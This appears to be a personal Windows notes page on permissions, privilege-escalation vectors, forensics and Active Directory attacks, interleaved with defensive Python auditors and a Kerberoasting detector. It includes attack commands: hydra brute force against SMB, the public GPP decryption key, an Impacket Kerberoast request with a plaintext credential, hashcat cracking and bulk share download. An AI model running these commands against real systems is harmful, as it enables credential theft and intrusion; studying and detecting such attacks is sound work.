Windows
In case of doubt, reboot, Rowan Atkinson
Principles
Permissions
To check or set permissions:
icacls <folder>
# I - permission inherited from the parent container
# F - full access (full control)
# M - modify right/access
# OI - object inherit
# IO - inherit only
# CI - container inherit
# RX - read and execute
# AD - append data (add subdirectories)
# WD - write data and add files
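As an added illustration (not part of the original page), here is a small Python parser for icacls output that applies the legend above: it splits each ACE into its inheritance flags and its access rights, then flags allow-ACEs that hand a low-privileged principal (Everyone, BUILTIN\Users, Authenticated Users) a write-capable right (F, M, W, WD, AD). The sample output is constructed, not captured from a real system.

```python
import re
from typing import Dict, List

# Constructed sample of `icacls C:\Tools` output for a folder that was made
# modifiable by Everyone (example data, not captured from a real system).
SAMPLE_ICACLS_OUTPUT = r"""C:\Tools Everyone:(OI)(CI)(M)
         BUILTIN\Users:(I)(OI)(CI)(RX)
         NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
         BUILTIN\Administrators:(I)(OI)(CI)(F)
         CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that effectively mean "any local user".
LOW_PRIV_PRINCIPALS = {"everyone", r"builtin\users", r"nt authority\authenticated users"}

# Rights from the icacls legend that allow changing the folder's contents.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}

# Inheritance / scope markers, as opposed to access rights.
SCOPE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# One ACE per line: "<principal>:(FLAG)(FLAG)..." (the queried path prefixes the first line).
ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<flags>(?:\([A-Za-z,]+\))+)$")


def parse_icacls(output: str, path: str) -> List[Dict]:
    """Turn icacls text into ACE dicts: principal, rights, scope, inherited, deny."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):          # only the first ACE line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                        # blank line or the "Successfully processed" summary
        tokens = []
        for group in re.findall(r"\(([A-Za-z,]+)\)", m.group("flags")):
            tokens.extend(group.split(","))  # specific rights are comma-separated, e.g. (WD,AD)
        aces.append({
            "principal": m.group("principal"),
            "deny": "DENY" in tokens,
            "inherited": "I" in tokens,
            "scope": sorted(t for t in tokens if t in SCOPE_FLAGS),
            "rights": sorted(t for t in tokens if t not in SCOPE_FLAGS and t != "DENY"),
        })
    return aces


def find_weak_aces(output: str, path: str) -> List[Dict]:
    """Return allow-ACEs that give a low-privileged principal write access."""
    return [
        ace for ace in parse_icacls(output, path)
        if not ace["deny"]
        and ace["principal"].lower() in LOW_PRIV_PRINCIPALS
        and WRITE_RIGHTS & set(ace["rights"])
    ]


if __name__ == "__main__":
    for ace in find_weak_aces(SAMPLE_ICACLS_OUTPUT, r"C:\Tools"):
        origin = "inherited" if ace["inherited"] else "explicit"
        print(f"weak ACE: {ace['principal']} {ace['rights']} ({origin}, scope {ace['scope']})")
```

An explicit (non-inherited) weak ACE is the one to remove directly on the folder; an inherited one has to be fixed on the parent, which is what the (I) marker tells you.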
GPO
To refresh Group Policy:
gpupdate /force
Privileges
On a typical Windows server, you may find several different account types:
- Domain Administrators: This is typically the highest account level you will find in an enterprise along with Enterprise Administrators. An account with this level of privilege can manage all accounts of the organization, their access levels, and almost anything you can think of.
- Services: Accounts used by software to perform their tasks such as back-ups or antivirus scans.
- Domain users: Accounts typically used by employees. These should have just enough privileges to do their daily jobs. For example, a system administrator may restrict a user's ability to install and uninstall software.
- Local accounts: These accounts are only valid on the local system and cannot be used over the domain.
Windows Privilege Escalation Vectors
A few common vectors that could allow any user to increase their privilege levels on a Windows system:
- Stored Credentials: Important credentials can be saved in files by the user or in the configuration file of an application installed on the target system.
- Windows Kernel Exploit: The Windows operating system installed on the target system can have a known vulnerability that can be exploited to increase privilege levels.
- Insecure File/Folder Permissions: In some situations, even a low privileged user can have read or write privileges over files and folders that can contain sensitive information.
- Insecure Service Permissions: Similar to permissions over sensitive files and folders, low privileged users may have rights over services. These can be somewhat harmless such as querying the service status (SERVICE_QUERY_STATUS) or more interesting rights such as starting and stopping a service (SERVICE_START and SERVICE_STOP, respectively).
- DLL Hijacking: Applications use DLL files to support their execution. You can think of these as smaller applications that can be launched by the main application. Sometimes DLLs that are deleted or not present on the system are called by the application. This error doesn't always result in a failure of the application, and the application can still run. Finding a DLL the application is looking for in a location we can write to can help us create a malicious DLL file that will be run by the application. In such a case, the malicious DLL will run with the main application's privilege level. If the application has a higher privilege level than our current user, this could allow us to launch a shell with a higher privilege level.
- Unquoted Service Path: If the executable path of a service contains a space and is not enclosed within quotes, a hacker could introduce their own malicious executables to run instead of the intended executable.
- Always Install Elevated: Windows applications can be installed using Windows Installer (also known as MSI packages) files. These files make the installation process easy and straightforward. Windows systems can be configured with the "AlwaysInstallElevated" policy. This allows the installation process to run with administrator privileges without requiring the user to have these privileges. This feature allows users to install software that may need higher privileges without having this privilege level. If "AlwaysInstallElevated" is configured, a malicious executable packaged as an MSI file could be run to obtain a higher privilege level.
- Other software: Software, applications, or scripts installed on the target machine may also provide privilege escalation vectors.
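To make the "Unquoted Service Path" item concrete from the hardening side, here is an added Python example (not part of the original page) that audits service ImagePath values: for each unquoted path whose executable portion contains a space it lists the intermediate files the Windows loader would try first, and produces the corrected, quoted ImagePath. The ImagePath values are constructed sample data, and the rule that the executable ends at the first ".exe" is a simplification of CreateProcess behaviour that suffices for typical service entries.

```python
import re
from typing import Dict, List

# Constructed ImagePath values as they would appear under
# HKLM\SYSTEM\CurrentControlSet\Services\<name> (example data, not read from a registry).
SAMPLE_IMAGE_PATHS = {
    "GoodSvc": r'"C:\Program Files\Acme Agent\agent.exe" --service',
    "BadSvc": r"C:\Program Files\Acme Agent\agent.exe --service",
    "SystemSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "NoSpace": r"C:\Tools\svc.exe",
}

EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


def split_exe_and_args(image_path: str):
    """Heuristic split: the executable ends at the first '.exe', the rest is arguments."""
    path = image_path.strip()
    m = EXE_RE.search(path)
    if m is None:
        return path, ""             # drivers (.sys) and friends: treat the whole string as the image
    return path[: m.end()], path[m.end():]


def service_prefix_candidates(image_path: str) -> List[str]:
    """Files the loader would try, in order, before the intended executable.

    For an unquoted 'C:\\Program Files\\Acme Agent\\agent.exe --service' the
    system tries 'C:\\Program.exe', then 'C:\\Program Files\\Acme.exe', and
    only then the real binary. Returns [] when the path is quoted or the
    executable portion contains no space (nothing to audit).
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    exe, _ = split_exe_and_args(path)
    parts = exe.split(" ")
    if len(parts) == 1:
        return []
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def quoted_fix(image_path: str) -> str:
    """Return the ImagePath with the executable portion wrapped in double quotes."""
    exe, args = split_exe_and_args(image_path)
    return f'"{exe}"{args}'


def audit_image_paths(image_paths: Dict[str, str]) -> Dict[str, str]:
    """Map every service with an unquoted, space-containing path to its corrected ImagePath."""
    return {name: quoted_fix(p) for name, p in image_paths.items() if service_prefix_candidates(p)}


if __name__ == "__main__":
    for name, fixed in audit_image_paths(SAMPLE_IMAGE_PATHS).items():
        print(f"{name}: loader would first try {service_prefix_candidates(SAMPLE_IMAGE_PATHS[name])}")
        print(f"{name}: set ImagePath to {fixed}")
```

The directories named by the candidate list are the ones whose ACLs matter for this vector; the fix itself is simply re-registering the service with the quoted path (for example with sc config <name> binPath= "<quoted path>").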
Initial Information Gathering
A few key points in enumeration:
- Users on the target system: the command
net users
lists the users on the target system.
- OS version: the command
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
outputs information about the operating system. Use it to research whether a privilege escalation vulnerability exists for this version.
- Installed services: the command
wmic service list
lists the services installed on the target system.
Forensics
Registry hives
https://tryhackme.com/room/windowsforensics1
The interesting files are:
C
├── Users
│   ├── Administrator
│   │   ├── AppData
│   │   │   └── Local
│   │   │       └── Microsoft
│   │   │           └── Windows
│   │   │               ├── UsrClass.dat
│   │   │               ├── UsrClass.dat.LOG1
│   │   │               └── UsrClass.dat.LOG2
│   │   ├── NTUSER.DAT
│   │   ├── ntuser.dat.LOG1
│   │   └── ntuser.dat.LOG2
│   └── arthur
│       ├── AppData
│       │   └── Local
│       │       └── Microsoft
│       │           └── Windows
│       │               ├── UsrClass.dat
│       │               ├── UsrClass.dat.LOG1
│       │               └── UsrClass.dat.LOG2
│       ├── NTUSER.DAT
│       ├── ntuser.dat.LOG1
│       └── ntuser.dat.LOG2
└── Windows
    ├── appcompat
    │   └── Programs
    │       ├── Amcache.hve
    │       ├── Amcache.hve.LOG1
    │       └── Amcache.hve.LOG2
    └── System32
        └── config
            ├── RegBack
            │   ├── DEFAULT
            │   ├── SAM
            │   ├── SECURITY
            │   ├── SOFTWARE
            │   └── SYSTEM
            ├── DEFAULT
            ├── DEFAULT.LOG1
            ├── DEFAULT.LOG2
            ├── SAM
            ├── SAM.LOG1
            ├── SAM.LOG2
            ├── SECURITY
            ├── SECURITY.LOG1
            ├── SECURITY.LOG2
            ├── SOFTWARE
            ├── SOFTWARE.LOG1
            ├── SOFTWARE.LOG2
            ├── SYSTEM
            ├── SYSTEM.LOG1
            └── SYSTEM.LOG2

17 directories, 35 files
The .LOG files are the transaction logs of the registry hives. They contain more recent data than the hive itself and should therefore be taken into account. Eric Zimmerman's Registry Explorer can replay them when it loads a hive.
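Whether a hive actually needs its .LOG files replayed can be read from its 512-byte base block. As an added example (not from the page or from Registry Explorer), the Python below parses that header: the "regf" signature, the primary and secondary sequence numbers (when they differ, the hive is "dirty", meaning the last writes live only in the transaction logs), the last-written FILETIME, the hive name and the XOR checksum over the first 508 bytes. The offsets follow the documented regf layout; the sample hive headers are constructed in code, not taken from a real system.

```python
import struct
from datetime import datetime, timedelta, timezone

REGF_MAGIC = b"regf"
BASE_BLOCK_SIZE = 512
FILE_TYPES = {0: "primary", 1: "transaction log (legacy)", 2: "transaction log"}


def regf_checksum(base_block: bytes) -> int:
    """XOR of the 127 little-endian DWORDs at offsets 0..507, with the two documented special cases."""
    csum = 0
    for (dword,) in struct.iter_unpack("<I", base_block[:508]):
        csum ^= dword
    if csum == 0:
        return 1
    if csum == 0xFFFFFFFF:
        return 0xFFFFFFFE
    return csum


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME: 100 ns intervals since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_base_block(base_block: bytes) -> dict:
    """Decode the regf base block; raises ValueError on anything that is not a hive header."""
    if len(base_block) < BASE_BLOCK_SIZE or base_block[:4] != REGF_MAGIC:
        raise ValueError("not a regf base block")
    # offsets 4..43: primary seq, secondary seq, last written, major, minor,
    # file type, file format, root cell offset, hive bins data size
    seq1, seq2, last_written, major, minor, ftype, _fmt, root, hbins = struct.unpack_from(
        "<IIQIIIIII", base_block, 4)
    hive_name = base_block[48:112].decode("utf-16-le").rstrip("\x00")   # 64-byte UTF-16LE name field
    stored_checksum = struct.unpack_from("<I", base_block, 508)[0]
    return {
        "hive_name": hive_name,
        "primary_seq": seq1,
        "secondary_seq": seq2,
        "dirty": seq1 != seq2,            # unequal: the .LOG files hold unapplied writes
        "last_written": filetime_to_datetime(last_written),
        "version": f"{major}.{minor}",
        "file_type": FILE_TYPES.get(ftype, f"unknown ({ftype})"),
        "root_cell_offset": root,
        "hbins_size": hbins,
        "checksum_ok": stored_checksum == regf_checksum(base_block),
    }


def make_sample_base_block(primary_seq: int, secondary_seq: int, name: str) -> bytes:
    """Build a constructed base block (example data, not a real hive) with a valid checksum."""
    blk = bytearray(BASE_BLOCK_SIZE)
    blk[0:4] = REGF_MAGIC
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    last_written = int((datetime(2023, 1, 1, tzinfo=timezone.utc) - epoch).total_seconds()) * 10_000_000
    struct.pack_into("<IIQIIIIII", blk, 4, primary_seq, secondary_seq, last_written,
                     1, 5, 0, 1, 0x20, 0x1000)
    blk[48:112] = name.encode("utf-16-le").ljust(64, b"\x00")
    struct.pack_into("<I", blk, 508, regf_checksum(bytes(blk)))
    return bytes(blk)


if __name__ == "__main__":
    for blk in (make_sample_base_block(7, 7, "SYSTEM"), make_sample_base_block(9, 8, "SAM")):
        info = parse_base_block(blk)
        state = "DIRTY: replay the .LOG files" if info["dirty"] else "clean"
        print(f"{info['hive_name']}: seq {info['primary_seq']}/{info['secondary_seq']}, "
              f"{state}, last written {info['last_written']:%Y-%m-%d}, checksum ok={info['checksum_ok']}")
```

To apply this to a triage image, read the first 512 bytes of SYSTEM, SAM, SOFTWARE, SECURITY, NTUSER.DAT or UsrClass.dat and pass them to parse_base_block; a failing checksum means the header was damaged or the file was copied while being written, which is worth noting in the report.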
MFT
To parse an MFT and read it:
.\MFTECmd.exe -f 'C:\users\THM-4n6\Desktop\triage\C\$MFT' --csv parsed-mft.csv
.\MFTECmd.exe -f 'C:\users\THM-4n6\Desktop\triage\C\$BOOT' --csv parsed-mft.csv
Use EZViewer to look at the CSV files.
PowerShell
# time a command
Measure-Command {cmd}
# display a directory tree
tree /f
# symbolic link
new-item -itemtype symboliclink -path . -name settings.json -value "C:\Users\Kamil\OneDrive\Windows Terminal\settings.json"
# file hash (pick one algorithm: MD5, SHA256 or SHA512)
Get-FileHash filename -Algorithm SHA256
CertUtil -hashfile filename SHA256
Passwords
To log on with a local account rather than a domain account: .\username
Brute force over the network (not stealthy at all):
hydra -L usernames.txt -P rockyou.txt 192.168.10.1 smb
Password in SYSVOL
To decrypt the cpassword of an account defined in a GPO on a share:
- use the CyberChef recipe
- or gpp-decrypt if you need to work offline
AES256 key published by Microsoft:
# AES256 cipher key
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
# Initialisation Vector
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: https://adsecurity.org/?p=2288
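Because the key above is public, any cpassword left in SYSVOL is effectively plaintext, so the defensive task is finding them. As an added example (not part of the original page), the Python below scans Group Policy Preferences XML files for a non-empty cpassword attribute, reporting the file, the preference item and the account concerned. The SYSVOL file contents are constructed samples with placeholder ciphertext; on a real share you would read every *.xml under Policies\*\{Machine,User}\Preferences\ into the same dictionary.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample files (example data, placeholder GUIDs and ciphertext), keyed by their
# path relative to \\<domain>\SYSVOL\<domain>\.
SAMPLE_SYSVOL_FILES = {
    r"Policies\{00000000-0000-0000-0000-000000000001}\Machine\Preferences\Groups\Groups.xml": r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-00000000000A}">
  <User clsid="{00000000-0000-0000-0000-00000000000B}" name="LocalAdmin" changed="2023-01-01 00:00:00">
    <Properties action="U" newName="" fullName="" description="" cpassword="PLACEHOLDER_CIPHERTEXT_1"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
""",
    r"Policies\{00000000-0000-0000-0000-000000000002}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml": r"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{00000000-0000-0000-0000-00000000000C}">
  <Task clsid="{00000000-0000-0000-0000-00000000000D}" name="Nightly backup">
    <Properties action="C" name="Nightly backup" appName="backup.exe" runAs="MIDGAR\svc_backup"
                cpassword="PLACEHOLDER_CIPHERTEXT_2"/>
  </Task>
</ScheduledTasks>
""",
    r"Policies\{00000000-0000-0000-0000-000000000003}\User\Preferences\Drives\Drives.xml": r"""<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{00000000-0000-0000-0000-00000000000E}">
  <Drive clsid="{00000000-0000-0000-0000-00000000000F}" name="H:">
    <Properties action="U" path="\\fileserver\home" label="Home" persistent="1" userName="" cpassword=""/>
  </Drive>
</Drives>
""",
}


def find_cpasswords(files: Dict[str, str]) -> List[Dict]:
    """Return one finding per element carrying a non-empty cpassword attribute."""
    findings = []
    for path, content in files.items():
        try:
            root = ET.fromstring(content.encode("utf-8"))
        except ET.ParseError:
            continue                        # not XML, or truncated: skip rather than abort the scan
        for parent in root.iter():
            for elem in parent:
                cp = elem.get("cpassword")
                if not cp:                  # cpassword="" means no password is stored
                    continue
                # The account name lives in different attributes depending on the preference type.
                account = elem.get("userName") or elem.get("runAs") or elem.get("accountName") or ""
                findings.append({
                    "file": path,
                    "item": parent.get("name", parent.tag),
                    "account": account,
                    "cpassword_length": len(cp),
                })
    return findings


if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_SYSVOL_FILES):
        print(f"{f['file']}: item '{f['item']}' stores a cpassword for '{f['account']}'")
```

Each hit is a credential to rotate, and the preference itself should be removed from the GPO rather than re-encrypted, since the encryption offers no protection at all.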
Kerberoast
With Impacket:
python3 ./GetUserSPNs.py -request -dc-ip 192.168.10.1 MIDGAR.LAN/scarlet:password -outputfile kerberoast.hash
To crack these hashes:
hashcat -m 13100 -a 0 kerberoast.hash rockyou.txt -o output.txt
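On the detection side, the request phase above shows up on the domain controller as Kerberos service ticket events (Event ID 4769). As an added example (not part of the original page), the Python below runs two checks over constructed 4769 records exported as JSON lines with the EventData field names: it flags service tickets issued with RC4-HMAC (TicketEncryptionType 0x17, the type hashcat mode 13100 cracks) for user-style service accounts, and it flags one account requesting tickets for many distinct services in a short window, which is what a tool requesting every SPN at once looks like. The account names, services and addresses are sample values; the threshold and window are assumptions to tune per environment.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC = "0x17"                     # TicketEncryptionType value for RC4-HMAC service tickets
SWEEP_THRESHOLD = 5                   # distinct services requested by one account (assumed value)
SWEEP_WINDOW = timedelta(minutes=10)  # within this time span (assumed value)


def _event(ts: str, user: str, service: str, enc: str, ip: str) -> str:
    """Build one constructed 4769 record in the shape of an exported EventData block."""
    return json.dumps({"EventID": 4769, "TimeCreated": ts, "TargetUserName": user,
                       "ServiceName": service, "TicketEncryptionType": enc,
                       "IpAddress": ip, "Status": "0x0"})


# Constructed sample log: normal AES tickets, one legacy RC4 ticket, then one account
# pulling RC4 tickets for six different service accounts within a minute.
SAMPLE_LOG_LINES = [
    _event("2024-05-01T10:00:00", "alice@MIDGAR.LAN", "WS01$", "0x12", "192.168.10.21"),
    _event("2024-05-01T10:00:10", "bob@MIDGAR.LAN", "svc_sql", "0x12", "192.168.10.22"),
    _event("2024-05-01T10:01:00", "bob@MIDGAR.LAN", "svc_legacy", "0x17", "192.168.10.22"),
    *[_event(f"2024-05-01T10:05:{i:02d}", "scarlet@MIDGAR.LAN", svc, "0x17", "192.168.10.50")
      for i, svc in enumerate(["svc_sql", "svc_web", "svc_backup", "svc_ftp", "svc_exch", "svc_print"])],
]


def parse_events(lines: List[str]) -> List[Dict]:
    """Keep successful 4769 events for user-style service accounts."""
    events = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("EventID") != 4769 or rec.get("Status") != "0x0":
            continue
        service = rec["ServiceName"]
        if service.endswith("$") or service.lower() == "krbtgt":
            continue                  # computer accounts and the KDC itself are not roastable
        events.append({
            "time": datetime.fromisoformat(rec["TimeCreated"]),
            "user": rec["TargetUserName"],
            "service": service,
            "enc": rec["TicketEncryptionType"],
            "ip": rec["IpAddress"],
        })
    return events


def detect_kerberoasting(lines: List[str]) -> Dict:
    """Return RC4 service tickets and (user, ip) pairs sweeping many SPNs in SWEEP_WINDOW."""
    events = parse_events(lines)
    rc4_tickets = [e for e in events if e["enc"] == RC4_HMAC]

    by_source = defaultdict(list)
    for e in events:
        by_source[(e["user"], e["ip"])].append(e)

    sweeps = []
    for (user, ip), evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(evs)):          # sliding window over the account's requests
            while evs[end]["time"] - evs[start]["time"] > SWEEP_WINDOW:
                start += 1
            services = {e["service"] for e in evs[start:end + 1]}
            if len(services) >= SWEEP_THRESHOLD:
                sweeps.append({"user": user, "ip": ip, "services": sorted(services),
                               "first": evs[start]["time"], "last": evs[end]["time"]})
                break                         # one alert per source is enough
    return {"rc4_tickets": rc4_tickets, "sweeps": sweeps}


if __name__ == "__main__":
    result = detect_kerberoasting(SAMPLE_LOG_LINES)
    for e in result["rc4_tickets"]:
        print(f"RC4 ticket: {e['user']} -> {e['service']} from {e['ip']} at {e['time']:%H:%M:%S}")
    for s in result["sweeps"]:
        print(f"SPN sweep: {s['user']} from {s['ip']} hit {s['services']} between {s['first']:%H:%M:%S} and {s['last']:%H:%M:%S}")
```

A single RC4 ticket is usually a legacy application; the sweep is the stronger signal. The mitigation that removes the offline-cracking angle is to enforce AES on service accounts and to give them long, random passwords (or make them group Managed Service Accounts).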
Share
To retrieve all files from a share and study them locally:
smb: \> recurse
smb: \> prompt
smb: \> mget *
Useful links
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
Pentesting Active Directory mindmap: